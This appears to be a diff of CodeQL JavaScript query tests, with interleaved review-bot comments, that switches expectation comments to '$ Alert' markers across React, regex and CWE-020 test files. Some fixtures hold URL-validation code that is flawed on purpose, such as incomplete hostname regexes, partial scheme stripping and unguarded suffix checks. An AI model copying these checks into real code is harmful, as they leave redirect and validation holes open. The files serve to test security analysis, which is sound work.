NOT OK, but ignored because it is safe in practice + foo: this.state.foo, // $ Alert }); + bar: this.state.bar // OK - ignored because it is safe in practice } upd8b() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } } @@ -100,13 +100,13 @@ class C11 extends React.Component { upd8a() { var self = this; self.setState({ - foo: self.state.foo // NOT OK + foo: self.state.foo // $ Alert }); } upd8b() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } } diff --git a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js index f3c488d38b62..28cd077964f6 100644 --- a/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js 
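Review bot: In the `C10` hunk (`@@ -84,14 +84,14 @@`) the re-added line `bar: this.state.bar // OK - ignored because it is safe in practice` lands after the `});` context line instead of inside the object passed to `setState`. As the hunk reads, `bar:` becomes a labelled statement in `upd8a()`, so the fixture no longer exercises the `bar` property, which is more than a comment rewrite. The added lines should keep the old order: `foo: this.state.foo, // $ Alert`, then `bar: this.state.bar // OK - ignored because it is safe in practice`, followed by the existing `});`.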
+++ b/javascript/ql/test/query-tests/React/UnsupportedStateUpdateInLifecycleMethod/tst.js @@ -1,9 +1,9 @@ // update variants React.createClass({ render: function() { - this.setState({}); // NOT OK - this.replaceState({}); // NOT OK - this.forceUpdate({}); // NOT OK + this.setState({}); // $ Alert + this.replaceState({}); // $ Alert + this.forceUpdate({}); // $ Alert return
    } }); @@ -14,8 +14,8 @@ class MyClass1 extends React.Component { super(props); } render() { - this.indirectUpdate(); // NOT OK - this.veryIndirectUpdate(); // NOT OK + this.indirectUpdate(); // $ Alert + this.veryIndirectUpdate(); // $ Alert return
    } @@ -34,24 +34,24 @@ class MyClass1 extends React.Component { // definiteness variants React.createClass({ render: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert }, componentDidUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, shouldComponentUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } }, componentWillUpdate: function() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert if (cond) { - this.setState({}); // OK + this.setState({}); } } }); @@ -63,11 +63,11 @@ class MyClass2 extends React.Component { } componentWillUpdate() { - this.definiteIndirectUpdate(); // NOT OK + this.definiteIndirectUpdate(); // $ Alert if (cond) { - this.definiteIndirectUpdate(); // OK + this.definiteIndirectUpdate(); } - this.indefiniteIndirectUpdate(); // OK + this.indefiniteIndirectUpdate(); return
    } @@ -86,7 +86,7 @@ class MyClass2 extends React.Component { React.createClass({ render: function() { var app = this; - app.setState({}); // NOT OK + app.setState({}); // $ Alert return
    } }); @@ -105,7 +105,7 @@ React.createClass({ // eslint examples React.createClass({ componentDidUpdate: function() { - this.setState({ // NOT OK + this.setState({ // $ Alert name: this.props.name.toUpperCase() }); }, @@ -115,7 +115,7 @@ React.createClass({ }); React.createClass({ componentWillUpdate: function() { - this.setState({ // NOT OK + this.setState({ // $ Alert name: this.props.name.toUpperCase() }); }, @@ -138,7 +138,7 @@ class Search extends React.Component { render() { return ( - // NOT OK + // $ Alert ); } } @@ -147,25 +147,25 @@ class Search extends React.Component { class MyClass3 extends React.Component { constructor(props) { super(props); - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentDidUnmount() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getDefaultProps() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } getInitialState() { - this.setState({}); // NOT OK + this.setState({}); // $ Alert } componentWillUnmount() { - this.setState({}); // OK + this.setState({}); } componentWillMount() { - this.setState({}); // OK + this.setState({}); } componentDidMount() { - this.setState({}); // OK + this.setState({}); } } @@ -184,8 +184,8 @@ class MyClass4 extends React.Component { var doUpdate4 = () => this.myUpdate(); doUpdate4(); } - doUpdate1(); // NOT OK - doUpdate2(); // NOT OK - doUpdate3(); // NOT OK + doUpdate1(); // $ Alert + doUpdate2(); // $ Alert + doUpdate3(); // $ Alert } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index 6db5702e2fcf..acb79317790e 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js 
@@ -4,11 +4,11 @@ class C1 extends React.Component { this.setState({ writtenInSetState: 42 }); - this.state.writtenInOtherMethod; // OK - this.state.notWritten; // NOT OK - this.state.notWrittenButReadInChain; // NOT OK - this.state.writtenDirectly; // OK - this.state.writtenInSetState; // OK + this.state.writtenInOtherMethod; + this.state.notWritten; // $ Alert + this.state.notWrittenButReadInChain; // $ Alert + this.state.writtenDirectly; + this.state.writtenInSetState; } @@ -23,16 +23,16 @@ class C2 extends React.Component { s.writtenWhenEscaped = 42; } f(this.state); - this.state.writtenWhenEscaped; // OK - this.state.notWrittenWhenEscaped; // NOT OK, but ignored to avoid FP above + this.state.writtenWhenEscaped; + this.state.notWrittenWhenEscaped; // OK - ignored to avoid FP above } } class C3 extends React.Component { constructor() { - this.state.writtenThrougExternalPropertyAccess; // OK - this.state.notWrittenThrougExternalPropertyAccess; // NOT OK + this.state.writtenThrougExternalPropertyAccess; + this.state.notWrittenThrougExternalPropertyAccess; // $ Alert } } 
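Review bot: Rewording `// NOT OK, but ignored to avoid FP above` to `// OK - ignored to avoid FP above` on `this.state.notWrittenWhenEscaped` (hunk `@@ -23,16 +23,16 @@`) makes a recorded false negative read as correct code. Going by the old comment, the read is still a defect and only the query's decision not to report it is deliberate. I would keep that distinction in the marker, for example `this.state.notWrittenWhenEscaped; // $ MISSING: Alert - ignored to avoid FP above`. The same rewording recurs in the later hunks of this file (C4, C5, C6, C8, C9, C10 and the `createClass` cases).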
@@ -44,24 +44,24 @@ class C4 extends React.Component { return { writtenInUnknownInitializerObject: 42 }; } this.state = f(); - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } class C5 extends React.Component { constructor(x) { this.state = x; - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } new C5({writtenInUnknownInitializerObject: 42}); React.createClass({ render: function() { - this.state.writtenInKnownInitializerObject; // OK - this.state.notWrittenInKnownInitializerObject; // NOT OK + this.state.writtenInKnownInitializerObject; + this.state.notWrittenInKnownInitializerObject; // $ Alert return
    ; }, getInitialState: function() { @@ -74,8 +74,8 @@ React.createClass({ function f(){ return { writtenInUnknownInitializerObject: 42 }; } - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above return
    ; }, getInitialState: function() { @@ -86,8 +86,8 @@ React.createClass({ class C6 extends React.Component { constructor(x) { Object.assign(this.state, {writtenInObjectAssign: 42}); - this.state.writtenInObjectAssign; // OK - this.state.notWrittenInObjectAssign; // NOT OK, but ignored to avoid FP above + this.state.writtenInObjectAssign; + this.state.notWrittenInObjectAssign; // OK - ignored to avoid FP above } } @@ -96,8 +96,8 @@ class C6 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenSetState; // OK - this.state.notWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenSetState; + this.state.notWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -107,7 +107,7 @@ class C7 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenInSetState; // OK + this.state.writtenInSetState; this.setState(f); } } @@ -120,8 +120,8 @@ class C8 extends React.Component { function g() { return { writtenInSetState: 42 } } - this.state.writtenInSetState; // OK - this.state.notInWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenInSetState; + this.state.notInWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -131,8 +131,8 @@ class C9 extends React.Component { function f() { return "readThroughUnknownDynamicPropertyAccess"; } this.state[f()] = 42; - this.state.writtenThroughUnknownDynamicPropertyAccess; // OK - this.state.notWrittenThroughUnknownDynamicPropertyAccess; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownDynamicPropertyAccess; + this.state.notWrittenThroughUnknownDynamicPropertyAccess; // OK - ignored to avoid FP above } } 
@@ -141,15 +141,15 @@ class C10 extends React.Component { constructor() { var x = { writtenThroughUnknownSpreadAccess: 42 }; this.state = { ...x }; - this.state.writtenThroughUnknownSpreadAccess; // OK - this.state.notWrittenThroughUnknownSpreadAccess// NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownSpreadAccess; + this.state.notWrittenThroughUnknownSpreadAccess// OK - ignored to avoid FP above } } React.createClass({ render: function() { - this.state.writtenThroughMixin; // OK - this.state.notWrittenThroughMixin; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughMixin; + this.state.notWrittenThroughMixin; // OK - ignored to avoid FP above return

    Hello

    ; }, @@ -163,6 +163,6 @@ class C11 extends React.Component { } otherMethod() { - this.state.writeIn_getDerivedStateFromProps; // OK + this.state.writeIn_getDerivedStateFromProps; } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index d71aa7136da9..d2ff35967673 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -1,9 +1,9 @@ class C1 extends React.Component { constructor() { - this.state.readDirectly = 42; // OK - this.state.readInChain = {}; // OK - this.state.readInOtherMethod = {}; // OK - this.state.notRead = 42; // NOT OK + this.state.readDirectly = 42; + this.state.readInChain = {}; + this.state.readInOtherMethod = {}; + this.state.notRead = 42; // $ Alert this.state.readDirectly; this.state.readInChain.foo; } @@ -18,7 +18,7 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // NOT OK + this.state.readWhenEscaped = 42; // $ Alert f(this.state); } } @@ -26,8 +26,8 @@ class C2 extends React.Component { class C3 extends React.Component { constructor() { - this.state.readThrougExternaPropertyAccess = 42; // OK - this.state.notReadThrougExternaPropertyAccess = 42; // NOT OK + this.state.readThrougExternaPropertyAccess = 42; + this.state.notReadThrougExternaPropertyAccess = 42; // $ Alert } } 
@@ -36,8 +36,8 @@ new C3().state.readThrougExternaPropertyAccess; class C4 extends React.Component { constructor() { function f() { return "readThroughUnknownDynamicPropertyAccess"; } - this.state.readThroughUnknownDynamicPropertyAccess = 42; // OK - this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughUnknownDynamicPropertyAccess = 42; + this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // $ OK - ignored to avoid FP above this.state[f()]; } @@ -46,15 +46,15 @@ class C4 extends React.Component { class C5 extends React.Component { constructor() { - this.state.readThroughSpreadOperator = 42; // OK + this.state.readThroughSpreadOperator = 42; ({...this.state}); } } React.createClass({ render: function() { - this.state.readThroughMixin = 42; // OK - this.state.notReadThroughMixin = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughMixin = 42; + this.state.notReadThroughMixin = 42; // $ OK - ignored to avoid FP above return
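Review bot: `// $ OK - ignored to avoid FP above` on `notReadThroughUnknownDynamicPropertyAccess` puts `OK` behind the `$` marker, while undefined.js in this same commit writes the identical remark as `// OK - ignored to avoid FP above` with no `$`. If the expectation parser reads the text after `$` as expected tags (not verified from this page), `OK` would be treated as a result to match. I would use `// OK - ignored to avoid FP above`, or `// $ MISSING: Alert - ignored to avoid FP above` if it is meant as a known miss. The `notReadThroughMixin` line in the `@@ -46,15 +46,15 @@` hunk has the same form.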

    Hello

    ; }, @@ -68,7 +68,7 @@ class C6 extends React.Component { } constructor() { - this.state.readIn_getDerivedStateFromProps = 42; // OK + this.state.readIn_getDerivedStateFromProps = 42; } } diff --git a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js index 2ac332dfb38d..83fd7871d4ed 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js @@ -1,9 +1,9 @@ -/\1(abc)/; // NOT OK -/(a\1c)/; // NOT OK -/(ab)\2(c)/; // NOT OK -/(?:ab)\1(c)/; // NOT OK +/\1(abc)/; // $ Alert +/(a\1c)/; // $ Alert +/(ab)\2(c)/; // $ Alert +/(?:ab)\1(c)/; // $ Alert /(abc)\1/; /]*>((?:(?=([^<]+))\2|<(?!tpl\b[^>]*>))*?)<\/tpl>/; -/\k(?\w+)/; // NOT OK -/(?<=\1(.))a/; // OK -/(?<=(.)\1)a/; // NOT OK, but not currently flagged +/\k(?\w+)/; // $ Alert +/(?<=\1(.))a/; +/(?<=(.)\1)a/; // $ MISSING: Alert diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js index b2199e311374..7cf1ff3629b5 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js @@ -1,4 +1,3 @@ -// OK + /(.*?)a(?!(a+)b\2)/; -// NOT OK -/(.*?)a(?!(a+)b)\2(.*)/; +/(.*?)a(?!(a+)b)\2(.*)/; // $ Alert diff --git a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js index 59114b90c54a..942331c5453c 100644 --- a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js +++ b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js 
@@ -9,5 +9,5 @@ /[\x0a\x0a]/; /[\u000a\n]/; /[\u{ff}]/; -/[\u{12340}-\u{12345}]/u; // OK -new RegExp("[\u{12340}-\u{12345}]", "u"); // OK +/[\u{12340}-\u{12345}]/u; +new RegExp("[\u{12340}-\u{12345}]", "u"); diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js index 33325224dbbe..091c8049f193 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js +++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js @@ -1,16 +1,16 @@ -raw.replace("\\", "\\"); // NOT OK -raw.replace(/(\\)/, "\\"); // NOT OK -raw.replace(/["]/, "\""); // NOT OK -raw.replace("\\", "\\\\"); // OK +raw.replace("\\", "\\"); // $ Alert +raw.replace(/(\\)/, "\\"); // $ Alert +raw.replace(/["]/, "\""); // $ Alert +raw.replace("\\", "\\\\"); -raw.replace(/foo/g, 'foo'); // NOT OK -raw.replace(/foo/gi, 'foo'); // OK +raw.replace(/foo/g, 'foo'); // $ Alert +raw.replace(/foo/gi, 'foo'); -raw.replace(/^\\/, "\\"); // NOT OK -raw.replace(/\\$/, "\\"); // NOT OK -raw.replace(/\b\\/, "\\"); // NOT OK -raw.replace(/\B\\/, "\\"); // NOT OK -raw.replace(/\\(?!\\)/, "\\"); // NOT OK -raw.replace(/(?/g, "foo"); diff --git a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js index b4c54be9b8a6..e46442da3432 100644 --- a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js +++ b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js 
@@ -1,37 +1,37 @@ function optionalPrefix(x) { - return /^(https:)?/.test(x); // NOT OK + return /^(https:)?/.test(x); // $ Alert } function mandatoryPrefix(x) { - return /^https:/.test(x); // OK + return /^https:/.test(x); } function httpOrHttps(x) { - return /^https?:/.test(x); // OK + return /^https?:/.test(x); } function optionalSuffix(x) { - return /(\.com)?$/.test(x); // NOT OK + return /(\.com)?$/.test(x); // $ Alert } function mandatorySuffix(x) { - return /\.com$/.test(x); // OK + return /\.com$/.test(x); } function protocol(x) { - return /^(?:https?:|ftp:|file:)?/.test(x); // NOT OK + return /^(?:https?:|ftp:|file:)?/.test(x); // $ Alert } function doubleAnchored(x) { - return /^(foo|bar)?$/.test(x); // OK + return /^(foo|bar)?$/.test(x); } function noAnchor(x) { - return /(foo|bar)?/.test(x); // NOT OK + return /(foo|bar)?/.test(x); // $ Alert } function altAnchor(x) { - return /^foo|bar$|(baz)?/.test(x); // NOT OK + return /^foo|bar$|(baz)?/.test(x); // $ Alert } function wildcard(x) { @@ -43,31 +43,31 @@ function wildcard2(x) { } function emptyAlt(x) { - return /^$|foo|bar/.test(x); // OK + return /^$|foo|bar/.test(x); } function emptyAlt2(x) { - return /(^$|foo|bar)/.test(x); // OK + return /(^$|foo|bar)/.test(x); } function emptyAlt3(x) { - return /((^$|foo|bar))/.test(x); // OK + return /((^$|foo|bar))/.test(x); } function search(x) { - return x.search(/[a-z]*/) > -1; // NOT OK + return x.search(/[a-z]*/) > -1; // $ Alert } function search2(x) { - return x.search(/[a-z]/) > -1; // OK + return x.search(/[a-z]/) > -1; } function lookahead(x) { - return x.search(/(?!x)/) > -1; // OK + return x.search(/(?!x)/) > -1; } function searchPrefix(x) { - return x.search(/^(foo)?/) > -1; // NOT OK - `foo?` does not affect the returned index + return x.search(/^(foo)?/) > -1; // $ Alert - `foo?` does not affect the returned index } function searchSuffix(x) { 
@@ -83,10 +83,10 @@ function nonWordBoundary(x) { } function emptyRegex(x) { - return new RegExp("").test(x); // OK + return new RegExp("").test(x); } function parserTest(x) { - /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); // OK - /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); // ok + /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); + /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); } diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js index 9c5481469151..319eedf7e22c 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js @@ -1,16 +1,13 @@ -// OK + /\0/; -// NOT OK -/\1/; -// OK +/\1/; // $ Alert + /^(\s+)\w+\1$/; -// NOT OK -/^(?:\s+)\w+\1$/; -// OK +/^(?:\s+)\w+\1$/; // $ Alert + /[\1]/; -// OK + /^(?\s+)\w+\1$/; /^(?\s+)\w+\k$/; -// NOT OK -/^(?\s+)\w+\2$/; +/^(?\s+)\w+\2$/; // $ Alert /^(?\s+)\w+\k$/; diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js index 50d70094dd64..b35bd4172385 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js @@ -1,32 +1,28 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /(a|^b)c/; -// OK + /a*(^b|c)/; -// NOT OK -/a\n^b/; +/a\n^b/; // $ Alert + -// OK /a\n^b/m; -// NOT OK, but not recognised -/a\\n^b/m; +/a\\n^b/m; // $ MISSING: Alert + +/ab*^c/; // $ Alert -// NOT OK -/ab*^c/; -// OK /^^abc/; -// OK + /^(^y|^z)(u$|v$)$/; -// OK + /x*^y/; -// OK + /(?<=(^|\/)(\.|\.\.))$/; diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js index 95708b3cd0ed..86da692cea84 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js 
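Review bot: In `parserTest` the second regex is invoked with `.text(x)`, which is not a RegExp method, so that line probably never reaches the query as a regex test the way the `.test(x)` line above it does. With the `// ok` comment removed, nothing records that the line is expected to stay quiet. If the call is a typo, `/^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.test(x);` would make the case exercise the query. If it is intentional, a short comment saying so would keep the next reader from "fixing" it.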
+++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js @@ -1,38 +1,33 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /a(b$|c)/; -// OK + /(a|b$)c*/; -// NOT OK -/a$\nb/; +/a$\nb/; // $ Alert + -// OK /a$\nb/m; -// NOT OK, but not recognised -/a$\\nb/m; +/a$\\nb/m; // $ MISSING: Alert + +/a$b*c/; // $ Alert -// NOT OK -/a$b*c/; -// OK /^(^y|^z)(u$|v$)$/; -// OK + /.*x$$$/; -// OK + /x$y*/; -// OK + /x(?!y+$).*y.*/; -// OK + /x(?=[yz]+$).*yz.*/; -// NOT OK -/(?<=$x)yz/; +/(?<=$x)yz/; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js index 320175ab1d42..ae0447f132fd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js @@ -44,7 +44,7 @@ /^https:\/\/[a-z]*.example.com$/; // $ Alert RegExp('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); // $ Alert - /^(example.dev|example.com)/; // OK + /^(example.dev|example.com)/; new RegExp('^http://localhost:8000|' + '^https?://.+.example\\.com/'); // $ Alert @@ -55,8 +55,8 @@ new RegExp('^http://test\.example.com'); // $ Alert - /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK, wildcards are intentional - /^http:\/\/.\.example\.com\/index\.html/; // OK, the wildcard is intentional + /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK - wildcards are intentional + /^http:\/\/.\.example\.com\/index\.html/; // OK - the wildcard is intentional /^(foo.example\.com|whatever)$/; // $ Alert (but kinda OK - one disjunction doesn't even look like a hostname) if (s.matchAll("^http://test.example.com")) {} // $ Alert 
diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js index a4c6ed190f8f..964b9d23b0e9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js @@ -41,7 +41,7 @@ function test5(url) { function test6(url) { let protocol = new URL(url).protocol; - if (badProtocolsGood.includes(protocol)) // OK + if (badProtocolsGood.includes(protocol)) return "about:blank"; return url; } @@ -113,7 +113,7 @@ function chain1(url) { } function chain2(url) { - return url // OK + return url .replace(/javascript:/, "") .replace(/data:/, "") .replace(/vbscript:/, ""); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js index f719a0835a6d..61d4006886bc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js @@ -40,8 +40,8 @@ x.indexOf("index.php") !== -1; x.indexOf("index.css") !== -1; - x.indexOf("secure=true") !== -1; // OK (query param) - x.indexOf("&auth=") !== -1; // OK (query param) + x.indexOf("secure=true") !== -1; // OK - query param + x.indexOf("&auth=") !== -1; // OK - query param x.indexOf(getCurrentDomain()) !== -1; // $ MISSING: Alert x.indexOf(location.origin) !== -1; // $ MISSING: Alert 
diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js index f50c014b1853..bd9ef71514b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js 
@@ -1,70 +1,70 @@ function endsWith(x, y) { - return x.indexOf(y) === x.length - y.length; // NOT OK + return x.indexOf(y) === x.length - y.length; // $ Alert } function endsWithGood(x, y) { - return x.length >= y.length && x.indexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.indexOf(y) === x.length - y.length; } function withStringConcat(x, y) { - return x.indexOf("/" + y) === x.length - y.length - 1; // NOT OK + return x.indexOf("/" + y) === x.length - y.length - 1; // $ Alert } function withStringConcatGood(x, y) { - return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; // OK + return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; } function withDelta(x, y) { let delta = x.length - y.length; - return x.indexOf(y) === delta; // NOT OK + return x.indexOf(y) === delta; // $ Alert } function withDeltaGood(x, y) { let delta = x.length - y.length; - return delta >= 0 && x.indexOf(y) === delta; // OK + return delta >= 0 && x.indexOf(y) === delta; } function literal(x) { - return x.indexOf("example.com") === x.length - "example.com".length; // NOT OK + return x.indexOf("example.com") === x.length - "example.com".length; // $ Alert } function literalGood(x) { return x.length >= "example.com".length && x.indexOf("example.com") === x.length - "example.com".length; } function intLiteral(x) { - return x.indexOf("example.com") === x.length - 11; // NOT OK + return x.indexOf("example.com") === x.length - 11; // $ Alert } function intLiteralGood(x) { return x.length >= 11 && x.indexOf("example.com") === x.length - 11; } function lastIndexOf(x, y) { - return x.lastIndexOf(y) === x.length - y.length; // NOT OK + return x.lastIndexOf(y) === x.length - y.length; // $ Alert } function lastIndexOfGood(x, y) { - return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; } function withIndexOfCheckGood(x, y) { let index 
= x.indexOf(y); - return index !== -1 && index === x.length - y.length - 1; // OK + return index !== -1 && index === x.length - y.length - 1; } function indexOfCheckEquality(x, y) { - return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckEqualityBad(x, y) { - return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function indexOfCheckGood(x, y) { - return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckGoodSharp(x, y) { - return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckBad(x, y) { - return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function endsWithSlash(x) { 
@@ -73,39 +73,39 @@ function endsWithSlash(x) { function withIndexOfCheckBad(x, y) { let index = x.indexOf(y); - return index !== 0 && index === x.length - y.length - 1; // NOT OK + return index !== 0 && index === x.length - y.length - 1; // $ Alert } function plus(x, y) { - return x.indexOf("." + y) === x.length - (y.length + 1); // NOT OK + return x.indexOf("." + y) === x.length - (y.length + 1); // $ Alert } function withIndexOfCheckLower(x, y) { let index = x.indexOf(y); - return !(index < 0) && index === x.length - y.length - 1; // OK + return !(index < 0) && index === x.length - y.length - 1; } function withIndexOfCheckLowerEq(x, y) { let index = x.indexOf(y); - return !(index <= -1) && index === x.length - y.length - 1; // OK + return !(index <= -1) && index === x.length - y.length - 1; } function lastIndexNeqMinusOne(x) { - return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; } function lastIndexEqMinusOne(x) { - return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; } function sameCheck(allowedOrigin) { const trustedAuthority = "example.com"; const ind = trustedAuthority.indexOf("." + allowedOrigin); - return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; // OK + return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; } function 